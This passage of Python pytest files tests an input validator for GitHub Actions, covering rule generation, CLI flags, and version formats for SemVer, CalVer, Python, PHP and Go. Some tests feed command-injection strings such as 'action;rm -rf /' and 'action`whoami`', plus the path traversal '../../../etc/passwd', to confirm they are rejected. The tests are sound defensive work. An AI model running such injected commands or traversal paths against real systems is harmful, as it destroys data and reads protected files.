print_calls = [call.args[0] for call in mock_print.call_args_list]
assert any("Missing fields" in call for call in print_calls)
def test_validate_rules_files_invalid_yaml(self):
"""Test validation of rules files with invalid YAML."""
# Create action directory structure
action_dir = self.temp_path / "actions" / "test-action"
action_dir.mkdir(parents=True, exist_ok=True)
# Create an invalid YAML file
rules_file = action_dir / "rules.yml"
with rules_file.open("w") as f:
f.write("invalid: yaml: content: [unclosed")
with patch.object(ValidationRuleGenerator, "__init__", lambda _self, **_kwargs: None):
generator = ValidationRuleGenerator()
generator.actions_dir = self.temp_path / "actions"
with patch("builtins.print") as mock_print:
result = generator.validate_rules_files()
assert result is False
# Verify error was printed
print_calls = [call.args[0] for call in mock_print.call_args_list]
assert any("rules.yml:" in call for call in print_calls)
class TestCLIFunctionality:
"""Test CLI functionality and main function."""
def test_main_dry_run(self):
"""Test main function with --dry-run flag."""
test_args = ["update-validators.py", "--dry-run"]
with (
patch("sys.argv", test_args),
patch.object(
ValidationRuleGenerator,
"generate_rules",
) as mock_generate,
):
main()
mock_generate.assert_called_once()
def test_main_specific_action(self):
"""Test main function with --action flag."""
test_args = ["update-validators.py", "--action", "test-action"]
with (
patch("sys.argv", test_args),
patch.object(
ValidationRuleGenerator,
"generate_rules",
) as mock_generate,
):
main()
mock_generate.assert_called_once()
def test_main_validate_success(self):
"""Test main function with --validate flag (success case)."""
test_args = ["update-validators.py", "--validate"]
with (
patch("sys.argv", test_args),
patch.object(
ValidationRuleGenerator,
"validate_rules_files",
return_value=True,
),
patch("sys.exit") as mock_exit,
):
main()
mock_exit.assert_called_once_with(0)
def test_main_validate_failure(self):
"""Test main function with --validate flag (failure case)."""
test_args = ["update-validators.py", "--validate"]
with (
patch("sys.argv", test_args),
patch.object(
ValidationRuleGenerator,
"validate_rules_files",
return_value=False,
),
patch("sys.exit") as mock_exit,
):
main()
mock_exit.assert_called_once_with(1)
def test_argparse_configuration(self):
"""Test argument parser configuration."""
parser = argparse.ArgumentParser()
parser.add_argument("--dry-run", action="store_true")
parser.add_argument("--action", metavar="NAME")
parser.add_argument("--validate", action="store_true")
# Test dry-run flag
args = parser.parse_args(["--dry-run"])
assert args.dry_run is True
assert args.action is None
assert args.validate is False
# Test action flag
args = parser.parse_args(["--action", "test-action"])
assert args.dry_run is False
assert args.action == "test-action"
assert args.validate is False
# Test validate flag
args = parser.parse_args(["--validate"])
assert args.dry_run is False
assert args.action is None
assert args.validate is True
class TestIntegrationScenarios:
"""Integration tests that verify end-to-end functionality."""
def setup_method(self):
"""Set up test environment."""
self.temp_dir = tempfile.mkdtemp()
self.temp_path = Path(self.temp_dir)
# Create mock project structure
self.actions_dir = self.temp_path / "actions"
self.actions_dir.mkdir()
self.validate_inputs_dir = self.actions_dir / "validate-inputs"
self.validate_inputs_dir.mkdir()
self.rules_dir = self.validate_inputs_dir / "rules"
self.rules_dir.mkdir()
def teardown_method(self):
"""Clean up after tests."""
import shutil
shutil.rmtree(self.temp_dir)
def create_realistic_action(self, name: str) -> None:
"""Create a realistic action for testing."""
action_dir = self.actions_dir / name
action_dir.mkdir()
inputs = {
"version": {"description": "Version to release", "required": True},
"token": {
"description": "GitHub token",
"required": False,
"default": "${{ github.token }}",
},
"dry-run": {"description": "Perform a dry run", "required": False, "default": "false"},
"dockerfile": {
"description": "Path to Dockerfile",
"required": False,
"default": "Dockerfile",
},
}
action_yml = {
"name": f"{name.title()} Action",
"description": f"GitHub Action for {name}",
"inputs": inputs,
"runs": {"using": "composite", "steps": [{"run": "echo 'test'", "shell": "bash"}]},
}
with (action_dir / "action.yml").open("w") as f:
yaml.dump(action_yml, f)
def test_full_generation_workflow(self):
"""Test the complete rule generation workflow."""
# Create multiple realistic actions
self.create_realistic_action("docker-build")
self.create_realistic_action("github-release")
# Initialize generator pointing to our test directory
generator = ValidationRuleGenerator(dry_run=False)
generator.actions_dir = self.actions_dir
# Run the generation
with patch("builtins.print"): # Suppress output
generator.generate_rules()
# Verify rules were generated in action folders
docker_rules_file = self.actions_dir / "docker-build" / "rules.yml"
github_rules_file = self.actions_dir / "github-release" / "rules.yml"
assert docker_rules_file.exists()
assert github_rules_file.exists()
# Verify generated rules content
with docker_rules_file.open() as f:
docker_content = f.read()
assert "# Validation rules for docker-build action" in docker_content
assert "DO NOT EDIT MANUALLY" in docker_content
# Parse and verify the YAML structure
yaml_content = docker_content.split("\n\n", 1)[1]
docker_rules = yaml.safe_load(yaml_content)
assert docker_rules["action"] == "docker-build"
assert "version" in docker_rules["required_inputs"]
assert "token" in docker_rules["optional_inputs"]
assert docker_rules["conventions"]["version"] == "flexible_version"
assert docker_rules["conventions"]["token"] == "github_token"
assert docker_rules["conventions"]["dry-run"] == "boolean"
assert docker_rules["conventions"]["dockerfile"] == "file_path"
def test_specific_action_generation(self):
"""Test generating rules for a specific action only."""
self.create_realistic_action("docker-build")
self.create_realistic_action("github-release")
generator = ValidationRuleGenerator(dry_run=False, specific_action="docker-build")
generator.actions_dir = self.actions_dir
with patch("builtins.print"):
generator.generate_rules()
# Only docker-build rules should be generated
docker_rules_file = self.actions_dir / "docker-build" / "rules.yml"
github_rules_file = self.actions_dir / "github-release" / "rules.yml"
assert docker_rules_file.exists()
assert not github_rules_file.exists()
def test_error_handling_during_generation(self):
"""Test error handling when action parsing fails."""
# Create an action with invalid YAML
action_dir = self.actions_dir / "invalid-action"
action_dir.mkdir()
with (action_dir / "action.yml").open("w") as f:
f.write("invalid: yaml: content: [unclosed")
generator = ValidationRuleGenerator(dry_run=False)
generator.actions_dir = self.actions_dir
generator.rules_dir = self.rules_dir
with patch("builtins.print") as mock_print:
generator.generate_rules()
# Verify error was handled and reported
print_calls = [str(call) for call in mock_print.call_args_list]
assert any(
"Failed to generate rules" in call or "Error processing" in call for call in print_calls
)

248
validate-inputs/tests/test_validate-inputs_custom.py Normal file
View File

@@ -0,0 +1,248 @@
"""Tests for validate-inputs custom validator."""
# pylint: disable=invalid-name # Test file name matches action name
from pathlib import Path
import sys
# Add action directory to path to import custom validator
action_path = Path(__file__).parent.parent.parent / "validate-inputs"
if str(action_path) not in sys.path:
sys.path.insert(0, str(action_path))
# Force reload to avoid cached imports from other test files
if "CustomValidator" in sys.modules:
del sys.modules["CustomValidator"]
from CustomValidator import CustomValidator
class TestCustomValidateInputsValidator:
"""Test cases for validate-inputs custom validator."""
def setup_method(self):
"""Set up test fixtures."""
self.validator = CustomValidator("validate-inputs")
def teardown_method(self):
"""Clean up after tests."""
self.validator.clear_errors()
def test_initialization(self):
"""Test validator initialization."""
assert self.validator.action_type == "validate-inputs"
assert self.validator.boolean_validator is not None
assert self.validator.file_validator is not None
def test_validate_inputs_empty(self):
"""Test validation with empty inputs."""
inputs = {}
result = self.validator.validate_inputs(inputs)
assert result is True
assert not self.validator.has_errors()
def test_validate_action_valid(self):
"""Test validation with valid action names."""
valid_actions = [
"docker-build",
"npm-publish",
"pre-commit",
"version-validator",
"common_cache",
]
for action in valid_actions:
self.validator.clear_errors()
inputs = {"action": action}
result = self.validator.validate_inputs(inputs)
assert result is True, f"Should accept action: {action}"
assert not self.validator.has_errors()
def test_validate_action_type_valid(self):
"""Test validation with valid action-type."""
inputs = {"action-type": "docker-build"}
result = self.validator.validate_inputs(inputs)
assert result is True
assert not self.validator.has_errors()
def test_validate_action_empty(self):
"""Test validation rejects empty action name."""
inputs = {"action": ""}
result = self.validator.validate_inputs(inputs)
assert result is False
assert self.validator.has_errors()
assert any("empty" in error.lower() for error in self.validator.errors)
def test_validate_action_dangerous_characters(self):
"""Test validation rejects actions with dangerous characters."""
dangerous_actions = [
"action;rm -rf /",
"action`whoami`",
"action$var",
"action&background",
"action|pipe",
"action>redirect",
"action<input",
"action\nne wline",
"action\rcarriage",
"action/slash",
]
for action in dangerous_actions:
self.validator.clear_errors()
inputs = {"action": action}
result = self.validator.validate_inputs(inputs)
assert result is False, f"Should reject action: {action}"
assert self.validator.has_errors()
assert any("invalid characters" in error.lower() for error in self.validator.errors)
def test_validate_action_invalid_format(self):
"""Test validation rejects invalid action name formats."""
invalid_actions = [
"Action", # Uppercase
"ACTION", # All uppercase
"1action", # Starts with digit
"action-", # Ends with hyphen
"-action", # Starts with hyphen
"action_", # Ends with underscore
"act!on", # Special character
"act ion", # Space
]
for action in invalid_actions:
self.validator.clear_errors()
inputs = {"action": action}
result = self.validator.validate_inputs(inputs)
assert result is False, f"Should reject action: {action}"
assert self.validator.has_errors()
def test_validate_action_github_expression(self):
"""Test validation accepts GitHub expressions."""
inputs = {"action": "${{ inputs.action-name }}"}
result = self.validator.validate_inputs(inputs)
assert result is True
assert not self.validator.has_errors()
def test_validate_rules_file_valid(self):
"""Test validation with valid rules file paths."""
valid_paths = [
"./rules.yml",
"rules/validation.yml",
"config/rules.yaml",
]
for path in valid_paths:
self.validator.clear_errors()
inputs = {"rules-file": path}
result = self.validator.validate_inputs(inputs)
# Result depends on file existence, but should not crash
assert isinstance(result, bool)
def test_validate_fail_on_error_valid(self):
"""Test validation with valid fail-on-error values."""
valid_values = ["true", "false", "True", "False"]
for value in valid_values:
self.validator.clear_errors()
inputs = {"fail-on-error": value}
result = self.validator.validate_inputs(inputs)
assert result is True, f"Should accept fail-on-error: {value}"
assert not self.validator.has_errors()
def test_validate_fail_on_error_empty(self):
"""Test validation rejects empty fail-on-error."""
inputs = {"fail-on-error": ""}
result = self.validator.validate_inputs(inputs)
assert result is False
assert self.validator.has_errors()
assert any("cannot be empty" in error.lower() for error in self.validator.errors)
def test_validate_fail_on_error_invalid(self):
"""Test validation rejects invalid fail-on-error values."""
invalid_values = ["maybe", "invalid", "2", "unknown"]
for value in invalid_values:
self.validator.clear_errors()
inputs = {"fail-on-error": value}
result = self.validator.validate_inputs(inputs)
assert result is False, f"Should reject fail-on-error: {value}"
assert self.validator.has_errors()
def test_validate_combined_inputs(self):
"""Test validation with multiple inputs."""
inputs = {
"action": "docker-build",
"fail-on-error": "true",
}
result = self.validator.validate_inputs(inputs)
assert result is True
assert not self.validator.has_errors()
def test_validate_combined_invalid(self):
"""Test validation with multiple invalid inputs."""
inputs = {
"action": "",
"fail-on-error": "",
}
result = self.validator.validate_inputs(inputs)
assert result is False
assert self.validator.has_errors()
# Should have errors for both inputs
assert len(self.validator.errors) >= 2
def test_get_required_inputs(self):
"""Test required inputs detection."""
required = self.validator.get_required_inputs()
assert isinstance(required, list)
# No required inputs for validate-inputs action
assert len(required) == 0
def test_get_validation_rules(self):
"""Test validation rules."""
rules = self.validator.get_validation_rules()
assert isinstance(rules, dict)
assert "action" in rules
assert "action-type" in rules
assert "rules-file" in rules
assert "fail-on-error" in rules
# Check rule structure
assert rules["action"]["type"] == "string"
assert rules["action"]["required"] is False
assert "description" in rules["action"]
assert rules["fail-on-error"]["type"] == "boolean"
assert rules["fail-on-error"]["required"] is False
def test_error_propagation_from_file_validator(self):
"""Test error propagation from file validator."""
# Path with security issues
inputs = {"rules-file": "../../../etc/passwd"}
result = self.validator.validate_inputs(inputs)
assert result is False
assert self.validator.has_errors()
# Should have error propagated from file validator
assert any(
"security" in error.lower() or "traversal" in error.lower()
for error in self.validator.errors
)
def test_error_propagation_from_boolean_validator(self):
"""Test error propagation from boolean validator."""
inputs = {"fail-on-error": "not-a-boolean"}
result = self.validator.validate_inputs(inputs)
assert result is False
assert self.validator.has_errors()
# Should have error propagated from boolean validator
assert any("boolean" in error.lower() for error in self.validator.errors)
def test_github_expressions_in_all_fields(self):
"""Test GitHub expressions accepted in all fields."""
inputs = {
"action": "${{ inputs.action }}",
"rules-file": "${{ github.workspace }}/rules.yml",
"fail-on-error": "${{ inputs.fail }}",
}
result = self.validator.validate_inputs(inputs)
# GitHub expressions should be accepted
assert result is True
assert not self.validator.has_errors()

243
validate-inputs/tests/test_validator.py Normal file
View File

@@ -0,0 +1,243 @@
"""Tests for the main validator entry point."""
import os
from pathlib import Path
import sys
import tempfile
from unittest.mock import MagicMock, patch
import pytest # pylint: disable=import-error
# Add the parent directory to the path
sys.path.insert(0, str(Path(__file__).parent.parent))
class TestValidatorScript:
"""Test the main validator.py script functionality."""
def setup_method(self):
"""Set up test environment before each test."""
# Clear environment variables
for key in list(os.environ.keys()):
if key.startswith("INPUT_"):
del os.environ[key]
# Create temporary output file
self.temp_output = tempfile.NamedTemporaryFile(mode="w", delete=False)
os.environ["GITHUB_OUTPUT"] = self.temp_output.name
self.temp_output.close()
def teardown_method(self):
"""Clean up after each test."""
# Clean up temp file
if hasattr(self, "temp_output") and Path(self.temp_output.name).exists():
os.unlink(self.temp_output.name)
# Clear environment
for key in list(os.environ.keys()):
if key.startswith("INPUT_"):
del os.environ[key]
def test_main_no_action_type(self):
"""Test that validator fails when no action type is provided."""
# Remove action type
if "INPUT_ACTION_TYPE" in os.environ:
del os.environ["INPUT_ACTION_TYPE"]
from validator import main
with pytest.raises(SystemExit) as exc_info:
main()
assert exc_info.value.code == 1
def test_main_with_valid_inputs(self):
"""Test validator with valid inputs."""
os.environ["INPUT_ACTION_TYPE"] = "docker-build"
os.environ["INPUT_CONTEXT"] = "." # Required by docker-build custom validator
os.environ["INPUT_IMAGE"] = "myapp"
os.environ["INPUT_TAG"] = "v1.0.0"
from validator import main
# Should not raise SystemExit
main()
# Check output file
with Path(self.temp_output.name).open() as f:
output = f.read()
assert "status=success" in output
assert "action=docker_build" in output
def test_main_with_invalid_inputs(self):
"""Test validator with invalid inputs."""
os.environ["INPUT_ACTION_TYPE"] = "docker-build"
os.environ["INPUT_IMAGE"] = "INVALID-IMAGE" # Uppercase not allowed
from validator import main
with pytest.raises(SystemExit) as exc_info:
main()
assert exc_info.value.code == 1
# Check output file
with Path(self.temp_output.name).open() as f:
output = f.read()
assert "status=failure" in output
def test_main_collects_all_inputs(self):
"""Test that validator collects all INPUT_ environment variables."""
os.environ["INPUT_ACTION_TYPE"] = "test-action"
os.environ["INPUT_FIRST_INPUT"] = "value1"
os.environ["INPUT_SECOND_INPUT"] = "value2"
os.environ["INPUT_THIRD_INPUT"] = "value3"
# Mock the validator to capture inputs
mock_validator = MagicMock()
mock_validator.validate_inputs.return_value = True
mock_validator.errors = []
# Patch get_validator at module level
with patch("validator.get_validator") as mock_get_validator:
mock_get_validator.return_value = mock_validator
from validator import main
main()
# Check that validate_inputs was called with correct inputs
mock_validator.validate_inputs.assert_called_once()
inputs = mock_validator.validate_inputs.call_args[0][0]
# Should have both underscore and dash versions
assert inputs == {
"first_input": "value1",
"first-input": "value1",
"second_input": "value2",
"second-input": "value2",
"third_input": "value3",
"third-input": "value3",
}
def test_main_output_format(self):
"""Test that output is formatted correctly for GitHub Actions."""
os.environ["INPUT_ACTION_TYPE"] = "test-action"
from validators.base import BaseValidator
from validators.registry import ValidatorRegistry
class TestValidator(BaseValidator):
def validate_inputs(self, inputs): # noqa: ARG002
return True
def get_required_inputs(self):
return []
def get_validation_rules(self):
return {}
registry = ValidatorRegistry()
registry.register_validator("test-action", TestValidator)
from validator import main
main()
# Check GitHub output format
with Path(self.temp_output.name).open() as f:
output = f.read()
assert "status=success" in output
assert "action=test_action" in output
assert "inputs_validated=" in output
def test_main_error_reporting(self):
"""Test that validation errors are properly reported."""
os.environ["INPUT_ACTION_TYPE"] = "test-action"
os.environ["INPUT_TEST"] = "invalid"
# Create a mock validator that returns errors
mock_validator = MagicMock()
mock_validator.validate_inputs.return_value = False
mock_validator.errors = ["Test error 1", "Test error 2"]
# Patch get_validator at module level
with patch("validator.get_validator") as mock_get_validator:
mock_get_validator.return_value = mock_validator
from validator import main
with pytest.raises(SystemExit) as exc_info:
main()
assert exc_info.value.code == 1
# Check output file contains error count
with Path(self.temp_output.name).open() as f:
output = f.read()
assert "status=failure" in output
assert "errors=2" in output
class TestValidatorIntegration:
"""Integration tests for the validator system."""
def setup_method(self):
"""Set up test environment."""
self.temp_output = tempfile.NamedTemporaryFile(mode="w", delete=False)
os.environ["GITHUB_OUTPUT"] = self.temp_output.name
self.temp_output.close()
def teardown_method(self):
"""Clean up after tests."""
if hasattr(self, "temp_output") and Path(self.temp_output.name).exists():
os.unlink(self.temp_output.name)
# Clear environment
for key in list(os.environ.keys()):
if key.startswith("INPUT_"):
del os.environ[key]
def test_registry_loads_correct_validator(self):
"""Test that registry loads the correct validator for each action."""
from validators.registry import ValidatorRegistry
registry = ValidatorRegistry()
# Test that we get validators for known actions
docker_validator = registry.get_validator("docker-build")
assert docker_validator is not None
assert hasattr(docker_validator, "validate_inputs")
# Test fallback for unknown action
unknown_validator = registry.get_validator("unknown-action")
assert unknown_validator is not None
assert hasattr(unknown_validator, "validate_inputs")
def test_custom_validator_loading(self):
"""Test that custom validators are loaded when available."""
from validators.registry import ValidatorRegistry
registry = ValidatorRegistry()
# sync-labels has a custom validator
validator = registry.get_validator("sync-labels")
assert validator is not None
assert validator.__class__.__name__ == "CustomValidator"
def test_convention_based_validation(self):
"""Test that convention-based validation works."""
from validators.registry import ValidatorRegistry
registry = ValidatorRegistry()
validator = registry.get_validator("test-action")
# Test different convention patterns
test_inputs = {
"dry-run": "true", # Boolean
"token": "${{ github.token }}", # Token
"version": "1.2.3", # Version
"email": "test@example.com", # Email
}
# Convention validator should handle these
result = validator.validate_inputs(test_inputs)
# The result depends on the specific validation logic
assert isinstance(result, bool)

74
validate-inputs/tests/test_version-file-parser_custom.py Normal file
View File

@@ -0,0 +1,74 @@
"""Tests for version-file-parser custom validator.
Generated by generate-tests.py - Do not edit manually.
"""
# pylint: disable=invalid-name # Test file name matches action name
from pathlib import Path
import sys
# Add action directory to path to import custom validator
action_path = Path(__file__).parent.parent.parent / "version-file-parser"
sys.path.insert(0, str(action_path))
# pylint: disable=wrong-import-position
from CustomValidator import CustomValidator
class TestCustomVersionFileParserValidator:
"""Test cases for version-file-parser custom validator."""
def setup_method(self):
"""Set up test fixtures."""
self.validator = CustomValidator("version-file-parser")
def teardown_method(self):
"""Clean up after tests."""
self.validator.clear_errors()
def test_validate_inputs_valid(self):
"""Test validation with valid inputs."""
# TODO: Add specific valid inputs for version-file-parser
inputs = {}
result = self.validator.validate_inputs(inputs)
# Adjust assertion based on required inputs
assert isinstance(result, bool)
def test_validate_inputs_invalid(self):
"""Test validation with invalid inputs."""
# TODO: Add specific invalid inputs for version-file-parser
inputs = {"invalid_key": "invalid_value"}
result = self.validator.validate_inputs(inputs)
# Custom validators may have specific validation rules
assert isinstance(result, bool)
def test_required_inputs(self):
"""Test required inputs detection."""
required = self.validator.get_required_inputs()
assert isinstance(required, list)
# TODO: Assert specific required inputs for version-file-parser
def test_validation_rules(self):
"""Test validation rules."""
rules = self.validator.get_validation_rules()
assert isinstance(rules, dict)
# TODO: Assert specific validation rules for version-file-parser
def test_github_expressions(self):
"""Test GitHub expression handling."""
inputs = {
"test_input": "${{ github.token }}",
}
result = self.validator.validate_inputs(inputs)
assert isinstance(result, bool)
# GitHub expressions should generally be accepted
def test_error_propagation(self):
"""Test error propagation from sub-validators."""
# Custom validators often use sub-validators
# Test that errors are properly propagated
inputs = {"test": "value"}
self.validator.validate_inputs(inputs)
# Check error handling
if self.validator.has_errors():
assert len(self.validator.errors) > 0

74
validate-inputs/tests/test_version-validator_custom.py Normal file
View File

@@ -0,0 +1,74 @@
"""Tests for version-validator custom validator.
Generated by generate-tests.py - Do not edit manually.
"""
# pylint: disable=invalid-name # Test file name matches action name
from pathlib import Path
import sys
# Add action directory to path to import custom validator
action_path = Path(__file__).parent.parent.parent / "version-validator"
sys.path.insert(0, str(action_path))
# pylint: disable=wrong-import-position
from CustomValidator import CustomValidator
class TestCustomVersionValidatorValidator:
"""Test cases for version-validator custom validator."""
def setup_method(self):
"""Set up test fixtures."""
self.validator = CustomValidator("version-validator")
def teardown_method(self):
"""Clean up after tests."""
self.validator.clear_errors()
def test_validate_inputs_valid(self):
"""Test validation with valid inputs."""
# TODO: Add specific valid inputs for version-validator
inputs = {}
result = self.validator.validate_inputs(inputs)
# Adjust assertion based on required inputs
assert isinstance(result, bool)
def test_validate_inputs_invalid(self):
"""Test validation with invalid inputs."""
# TODO: Add specific invalid inputs for version-validator
inputs = {"invalid_key": "invalid_value"}
result = self.validator.validate_inputs(inputs)
# Custom validators may have specific validation rules
assert isinstance(result, bool)
def test_required_inputs(self):
"""Test required inputs detection."""
required = self.validator.get_required_inputs()
assert isinstance(required, list)
# TODO: Assert specific required inputs for version-validator
def test_validation_rules(self):
"""Test validation rules."""
rules = self.validator.get_validation_rules()
assert isinstance(rules, dict)
# TODO: Assert specific validation rules for version-validator
def test_github_expressions(self):
"""Test GitHub expression handling."""
inputs = {
"test_input": "${{ github.token }}",
}
result = self.validator.validate_inputs(inputs)
assert isinstance(result, bool)
# GitHub expressions should generally be accepted
def test_error_propagation(self):
"""Test error propagation from sub-validators."""
# Custom validators often use sub-validators
# Test that errors are properly propagated
inputs = {"test": "value"}
self.validator.validate_inputs(inputs)
# Check error handling
if self.validator.has_errors():
assert len(self.validator.errors) > 0

539
validate-inputs/tests/test_version.py Normal file
View File

@@ -0,0 +1,539 @@
"""Tests for the VersionValidator module."""
from pathlib import Path
import sys
import pytest # pylint: disable=import-error
# Add the parent directory to the path
sys.path.insert(0, str(Path(__file__).parent.parent))
# pylint: disable=wrong-import-position
from validators.version import VersionValidator
from tests.fixtures.version_test_data import (
CALVER_INVALID,
CALVER_VALID,
SEMVER_INVALID,
SEMVER_VALID,
)
class TestVersionValidator: # pylint: disable=too-many-public-methods
"""Test cases for VersionValidator."""
def setup_method(self): # pylint: disable=attribute-defined-outside-init
"""Set up test environment."""
self.validator = VersionValidator()
def test_initialization(self):
"""Test validator initialization."""
assert self.validator.errors == []
rules = self.validator.get_validation_rules()
assert "semantic" in rules
assert "calver" in rules
@pytest.mark.parametrize("version,description", SEMVER_VALID)
def test_validate_semver_valid(self, version, description):
"""Test SemVer validation with valid versions."""
self.validator.errors = []
result = self.validator.validate_semver(version)
assert result is True, f"Failed for {description}: {version}"
assert len(self.validator.errors) == 0
@pytest.mark.parametrize("version,description", SEMVER_INVALID)
def test_validate_semver_invalid(self, version, description):
"""Test SemVer validation with invalid versions."""
self.validator.errors = []
result = self.validator.validate_semver(version)
if version == "": # Empty version might be allowed
assert result is True or result is False # Depends on implementation
else:
assert result is False, f"Should fail for {description}: {version}"
@pytest.mark.parametrize("version,description", CALVER_VALID)
def test_validate_calver_valid(self, version, description):
"""Test CalVer validation with valid versions."""
self.validator.errors = []
result = self.validator.validate_calver(version)
assert result is True, f"Failed for {description}: {version}"
assert len(self.validator.errors) == 0
@pytest.mark.parametrize("version,description", CALVER_INVALID)
def test_validate_calver_invalid(self, version, description):
"""Test CalVer validation with invalid versions."""
self.validator.errors = []
result = self.validator.validate_calver(version)
assert result is False, f"Should fail for {description}: {version}"
assert len(self.validator.errors) > 0
def test_validate_flexible_version(self):
"""Test flexible version validation (CalVer or SemVer)."""
# Test versions that could be either
flexible_versions = [
"2024.3.1", # CalVer
"1.2.3", # SemVer
"v1.0.0", # SemVer with prefix
"2024.03.15", # CalVer
]
for version in flexible_versions:
self.validator.errors = []
result = self.validator.validate_flexible_version(version)
assert result is True, f"Should accept flexible version: {version}"
def test_validate_dotnet_version(self):
"""Test .NET version validation."""
valid_versions = [
"6.0",
"6.0.100",
"7.0.0",
"8.0",
"3.1.426",
]
for version in valid_versions:
self.validator.errors = []
result = self.validator.validate_dotnet_version(version)
assert result is True, f"Should accept .NET version: {version}"
def test_validate_terraform_version(self):
"""Test Terraform version validation."""
valid_versions = [
"1.0.0",
"1.5.7",
"0.14.0",
"1.6.0-alpha",
]
for version in valid_versions:
self.validator.errors = []
result = self.validator.validate_terraform_version(version)
assert result is True, f"Should accept Terraform version: {version}"
def test_validate_node_version(self):
"""Test Node.js version validation."""
valid_versions = [
"18",
"18.0.0",
"20.9.0",
"lts",
"latest",
"lts/hydrogen",
]
for version in valid_versions:
self.validator.errors = []
result = self.validator.validate_node_version(version)
assert result is True, f"Should accept Node version: {version}"
def test_validate_inputs(self):
"""Test the main validate_inputs method."""
inputs = {
"version": "1.2.3",
"release-version": "2024.3.1",
"node-version": "18",
}
result = self.validator.validate_inputs(inputs)
# Should handle version inputs based on conventions
assert isinstance(result, bool)
def test_version_with_prefix(self):
"""Test that version prefixes are handled correctly."""
versions_with_prefix = [
("v1.2.3", True), # Common v prefix
("V1.2.3", True), # Uppercase V
("release-1.2.3", False), # Other prefix
("ver1.2.3", False), # Invalid prefix
]
for version, should_pass in versions_with_prefix:
self.validator.errors = []
result = self.validator.validate_semver(version)
if should_pass:
assert result is True, f"Should accept: {version}"
else:
assert result is False, f"Should reject: {version}"
def test_get_validation_rules(self):
"""Test that validation rules are properly defined."""
rules = self.validator.get_validation_rules()
assert "semantic" in rules
assert "calver" in rules
assert "dotnet" in rules
assert "terraform" in rules
assert "node" in rules
assert "python" in rules
def test_validate_strict_semantic_version_valid(self):
"""Test strict semantic version validation with valid versions."""
valid_versions = [
"1.0.0",
"1.2.3",
"10.20.30",
"1.0.0-alpha",
"1.0.0-beta.1",
"1.0.0-rc.1+build.1",
"1.0.0+build",
"v1.2.3", # v prefix allowed
"latest", # Special case
]
for version in valid_versions:
self.validator.errors = []
result = self.validator.validate_strict_semantic_version(version)
assert result is True, f"Should accept strict semver: {version}"
assert len(self.validator.errors) == 0
def test_validate_strict_semantic_version_invalid(self):
"""Test strict semantic version validation with invalid versions."""
invalid_versions = [
"", # Empty not allowed in strict mode
"1.0", # Must be X.Y.Z
"1", # Must be X.Y.Z
"1.2.a", # Non-numeric
"1.2.3.4", # Too many parts
]
for version in invalid_versions:
self.validator.errors = []
result = self.validator.validate_strict_semantic_version(version)
assert result is False, f"Should reject strict semver: {version}"
assert len(self.validator.errors) > 0
def test_validate_version_by_type(self):
"""Test generic validate_version with different types."""
test_cases = [
("1.2.3", "semantic", True),
("2024.3.1", "calver", True),
("2024.3.1", "flexible", True),
("1.2.3", "flexible", True),
("6.0.100", "dotnet", True),
("1.5.7", "terraform", True),
("18.0.0", "node", True),
("3.10", "python", True),
("8.2", "php", True),
("1.21", "go", True),
("latest", "flexible", True), # Special case - only flexible handles latest properly
]
for version, version_type, expected in test_cases:
self.validator.errors = []
result = self.validator.validate_version(version, version_type)
assert result == expected, f"Failed for {version_type}: {version}"
def test_validate_python_version_valid(self):
"""Test Python version validation with valid versions."""
valid_versions = [
"3.8",
"3.9",
"3.10",
"3.11",
"3.12",
"3.13",
"3.14",
"3.15",
"3.10.5", # With patch
]
for version in valid_versions:
self.validator.errors = []
result = self.validator.validate_python_version(version)
assert result is True, f"Should accept Python version: {version}"
assert len(self.validator.errors) == 0
def test_validate_python_version_invalid(self):
"""Test Python version validation with invalid versions."""
invalid_versions = [
"2.7", # Python 2 not allowed (major must be 3)
"3.7", # Too old (minor < 8)
"3.16", # Too new (minor > 15)
"4.0", # Wrong major
"v3.10", # v prefix not allowed
]
for version in invalid_versions:
self.validator.errors = []
result = self.validator.validate_python_version(version)
assert result is False, f"Should reject Python version: {version}"
assert len(self.validator.errors) > 0
def test_validate_python_version_empty(self):
"""Test Python version allows empty (optional)."""
self.validator.errors = []
result = self.validator.validate_python_version("")
assert result is True
assert len(self.validator.errors) == 0
def test_validate_php_version_valid(self):
"""Test PHP version validation with valid versions."""
valid_versions = [
"7.4",
"8.0",
"8.1",
"8.2",
"8.3",
"9.0",
"7.4.33", # With patch
]
for version in valid_versions:
self.validator.errors = []
result = self.validator.validate_php_version(version)
assert result is True, f"Should accept PHP version: {version}"
assert len(self.validator.errors) == 0
def test_validate_php_version_invalid(self):
"""Test PHP version validation with invalid versions."""
invalid_versions = [
"", # Empty NOT allowed for PHP
"6.0", # Too old (major < 7)
"10.0", # Too new (major > 9)
"v8.2", # v prefix NOT allowed for PHP
"8", # Must have minor version
"8.100", # Minor too high
]
for version in invalid_versions:
self.validator.errors = []
result = self.validator.validate_php_version(version)
assert result is False, f"Should reject PHP version: {version}"
assert len(self.validator.errors) > 0
def test_validate_go_version_valid(self):
"""Test Go version validation with valid versions."""
valid_versions = [
"1.18",
"1.19",
"1.20",
"1.21",
"1.22",
"1.23",
"1.30",
"1.20.5", # With patch
]
for version in valid_versions:
self.validator.errors = []
result = self.validator.validate_go_version(version)
assert result is True, f"Should accept Go version: {version}"
assert len(self.validator.errors) == 0
def test_validate_go_version_invalid(self):
"""Test Go version validation with invalid versions."""
invalid_versions = [
"2.0", # Wrong major (must be 1)
"1.17", # Too old (minor < 18)
"1.31", # Too new (minor > 30)
"v1.21", # v prefix not allowed
]
for version in invalid_versions:
self.validator.errors = []
result = self.validator.validate_go_version(version)
assert result is False, f"Should reject Go version: {version}"
assert len(self.validator.errors) > 0
def test_validate_go_version_empty(self):
"""Test Go version allows empty (optional)."""
self.validator.errors = []
result = self.validator.validate_go_version("")
assert result is True
assert len(self.validator.errors) == 0
def test_validate_dotnet_version_invalid(self):
"""Test .NET version validation with invalid versions."""
invalid_versions = [
"v6.0", # v prefix not allowed
"2.0", # Major < 3
"21.0", # Major > 20
]
for version in invalid_versions:
self.validator.errors = []
result = self.validator.validate_dotnet_version(version)
assert result is False, f"Should reject .NET version: {version}"
assert len(self.validator.errors) > 0
def test_validate_dotnet_version_empty(self):
"""Test .NET version allows empty (optional)."""
self.validator.errors = []
result = self.validator.validate_dotnet_version("")
assert result is True
def test_validate_terraform_version_invalid(self):
"""Test Terraform version validation with invalid versions."""
invalid_versions = [
"1.0", # Must be X.Y.Z
"1", # Must be X.Y.Z
"1.0.0.0", # Too many parts
]
for version in invalid_versions:
self.validator.errors = []
result = self.validator.validate_terraform_version(version)
assert result is False, f"Should reject Terraform version: {version}"
def test_validate_terraform_version_empty(self):
"""Test Terraform version allows empty (optional)."""
result = self.validator.validate_terraform_version("")
assert result is True
def test_validate_node_version_keywords(self):
